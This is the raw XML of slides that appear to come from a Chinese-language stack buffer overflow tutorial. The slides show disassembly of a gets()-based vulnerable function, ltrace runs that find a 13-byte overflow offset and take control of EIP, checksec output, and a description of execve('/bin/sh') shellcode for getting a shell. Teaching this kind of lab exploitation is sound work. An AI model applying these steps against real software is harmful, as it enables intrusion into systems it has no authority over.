          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15994422" y="9695259"/>
            <a:ext cx="1078457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04" name="ebp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15036800" y="9371330"/>
            <a:ext cx="8669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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1105" name="0xc0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="7641180"/>
            <a:ext cx="10698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0xc0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1106" name="dddd"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="81064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dddd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8944689"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108" name="bbbb"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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bbbb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1112" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15041751" y="7682230"/>
            <a:ext cx="2027050" cy="637541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2027048" cy="637540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1110" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="968311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1111" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="318769"/>
              <a:ext cx="1079501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13" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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1116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117" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136940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  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118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9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0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1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2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3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4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5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6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7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128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129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130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131" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="55918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132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3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4" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1135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42192"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0x62626262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0xdc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0x8048426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136" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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1137" name="dddd"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="81064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dddd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8944689"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139" name="bbbb"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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42192"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>bbbb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15035407" y="10151189"/>
            <a:ext cx="2039737" cy="637541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2039736" cy="637540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1141" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="968311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1142" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="961279" y="356869"/>
              <a:ext cx="1078458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44" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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0x61616161"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="547088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0x61616161</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1147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148" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11369400" cy="796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0804840b &lt;vul&gt;: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804840b:	55                   	push   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804840c:	89 e5                	mov    %esp,%ebp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804840e:	83 ec 18             	sub    $0x18,%esp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8048411:	83 ec 0c             	sub    $0xc,%esp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8048414:	8d 45 f7             	lea    -0x9(%ebp),%eax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8048417:	50                   	push   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8048418:	e8 c3 fe ff ff       	call   80482e0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804841d:	83 c4 10             	add    $0x10,%esp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8048420:	b8 00 00 00 00       	mov    $0x0,%eax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8048425:	c9                   	leave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8048426:	c3                   	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08048427 &lt;main&gt;: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lvl="4" indent="914400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8048435:	83 ec 04             	sub    $0x4,%esp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8048438:	e8 ce ff ff ff       	call   804840b &lt;vul&gt;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804843d:	b8 00 00 00 00       	mov    $0x0,%eax   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149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0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1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2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3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4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5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6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7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8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159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160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161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162" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="55918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163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4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5" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1166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942192"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0x62626262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2600"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0x61616161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167" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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1168" name="dddd"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="81064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dddd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8944689"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170" name="bbbb"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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42192"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>bbbb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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172" name="esp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15033142" y="11009630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esp </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15994422" y="11366499"/>
            <a:ext cx="1078457" cy="2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root@Ubuntu : tmp ➤ python -c &quot;print 'a'*10&quot;|ltrace -if ./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113850" y="2743359"/>
            <a:ext cx="22143601" cy="359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python -c "print 'a'*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:t>"|ltrace -if ./easy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6229] [0x8048331] __libc_start_main(0x8048427, 1, 0xffaccfa4, 0x8048450 &lt;unfinished ...&gt;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6229] [0x804841d] gets(0xffaccedf, 0xf76c9000, 0xf76c7244, 0xf752f0ec)                                = 0xffaccedf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6229] [0xffffffffffffffff] +++ exited (status 0) +++</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1176" name="程式正常結束！"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8930005" y="6911869"/>
            <a:ext cx="6511291" cy="136779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程式正常結束！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18209193" y="9973729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2600"/>
              </a:buClr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找出溢出點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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1178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6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root@Ubuntu : tmp ➤ python -c &quot;print 'a'*15&quot;|ltrace -if ./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113850" y="2743359"/>
            <a:ext cx="22143601" cy="418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python -c "print 'a'*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:t>"|ltrace -if ./easy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6232] [0x8048331] __libc_start_main(0x8048427, 1, 0xffad0484, 0x8048450 &lt;unfinished ...&gt;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6232] [0x804841d] gets(0xffad03bf, 0xf775a000, 0xf7758244, 0xf75c00ec)                                = 0xffad03bf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6232] [0x800</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6161</a:t>
            </a:r>
            <a:r>
              <a:t>] --- SIGSEGV (Segmentation fault) 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6232] [0xffffffffffffffff] +++ killed by SIGSEGV +++</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="EIP低2byte為0x61！"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7912020" y="6911869"/>
            <a:ext cx="8547260" cy="136779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EIP低2byte為0x61！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18209193" y="9973729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2600"/>
              </a:buClr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找出溢出點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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="故溢出點為13個字元之後"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7049859" y="6911869"/>
            <a:ext cx="10271583" cy="136779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故溢出點為13個字元之後</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118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1" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1183" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1181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root@Ubuntu : tmp ➤ python -c &quot;print 'a'*13+'bbbb'&quot;|ltrace -if ./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113850" y="2743359"/>
            <a:ext cx="22143601" cy="418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python -c "print 'a'*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:t>+'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bbbb</a:t>
            </a:r>
            <a:r>
              <a:t>'"|ltrace -if ./easy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6235] [0x8048331] __libc_start_main(0x8048427, 1, 0xffff6b54, 0x8048450 &lt;unfinished ...&gt;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6235] [0x804841d] gets(0xffff6a8f, 0xf76dd000, 0xf76db244, 0xf75430ec)                                = 0xffff6a8f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6235] [</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x62626262</a:t>
            </a:r>
            <a:r>
              <a:t>] --- SIGSEGV (Segmentation fault) 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6235] [0xffffffffffffffff] +++ killed by SIGSEGV +++</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187" name="完整控制EIP!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9437657" y="6911869"/>
            <a:ext cx="5495985" cy="136779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完整控制EIP!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18209193" y="9973729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2600"/>
              </a:buClr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找出溢出點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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189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Screen Shot 2019-04-14 at 9.43.41 PM.png" descr="Screen Shot 2019-04-14 at 9.43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1648" y="5029775"/>
            <a:ext cx="8488004" cy="8550994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192" name="Shellcode"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="451585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Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="由組合語言編寫的一段op code…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="8900071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由組合語言編寫的一段op code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execve(“/bin/sh”, null, null);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溢出後將EIP指向到shellcode上</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>執行並拿到shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119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195" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10189103" y="11353800"/>
            <a:ext cx="6337831" cy="573171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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使用條件…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11414565" y="5996796"/>
            <a:ext cx="6469770" cy="264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chemeClr val="accent4">
                    <a:lumOff val="-10627"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>使用條件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="481263" indent="-481263">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumOff val="-10627"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>須已知buffer address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="481263" indent="-481263">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumOff val="-10627"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>程式沒有NX保護</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1198" name="root@Ubuntu : tmp ➤ checksec easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028138" y="7133446"/>
            <a:ext cx="7472250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checksec easy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  <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="4324D4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:t>] ‘/tmp/easy’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Arch:     i386-32-little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RELRO:    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="969600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Partial RELRO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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Stack:    </a:t>
            </a:r>
            <a:r>
              <a:t>No canary found</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4D2F2D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NX:       </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="B12513"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NX disabled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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    PIE:      </a:t>
            </a:r>
            <a:r>
              <a:t>No PIE (0x8048000)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4D2F2D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B1251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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    RWX:      </a:t>
            </a:r>
            <a:r>
              <a:t>Has RWX segments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="root@Ubuntu : tmp ➤ ltrace -if ./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12501731" y="2475610"/>
            <a:ext cx="9454169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t>ltrace -if ./easy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9775] [0x8048331] __libc_start_main(0x8048427, 1, 0xffffd634, 0x8048450 &lt;unfinished ...&gt;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9775] [0x804841d] gets(0xffffd56f, </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1202" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10121748" y="8701165"/>
            <a:ext cx="4324503" cy="879427"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4324502" cy="879426"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1200" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4324502" y="0"/>
              <a:ext cx="1" cy="879427"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="889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1" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="0" y="840555"/>
              <a:ext cx="4279466" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="lin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05" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17894134" y="4815696"/>
            <a:ext cx="1480982" cy="2606041"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1480981" cy="2606039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1203" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1480981" y="0"/>
              <a:ext cx="1" cy="2606041"/>
            </a:xfrm>
            <a:prstGeom prst="lin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4" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2561755"/>
              <a:ext cx="1449103" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="889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06" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23304500" y="12909221"/>
            <a:ext cx="478070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207" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550463" y="1176890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Clr>
                <a:srgbClr val="FF2600"/>
              </a:buClr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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23371741" y="56482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Subtitle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3258066" y="3829809"/>
            <a:ext cx="8718884" cy="739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marL="228600" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t> Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="914400" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Not maintain in Executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="914400" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Local Variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="914400" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>向下增長</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t> Heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="914400" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Not maintain in Executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="914400" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Dynamic Allocate Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="914400" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>向上增長</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3250095" y="2676863"/>
            <a:ext cx="6890703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Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="134" name="Picture Placeholder 3" descr="Picture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7181" y="-2"/>
            <a:ext cx="7029854" cy="1188031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 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
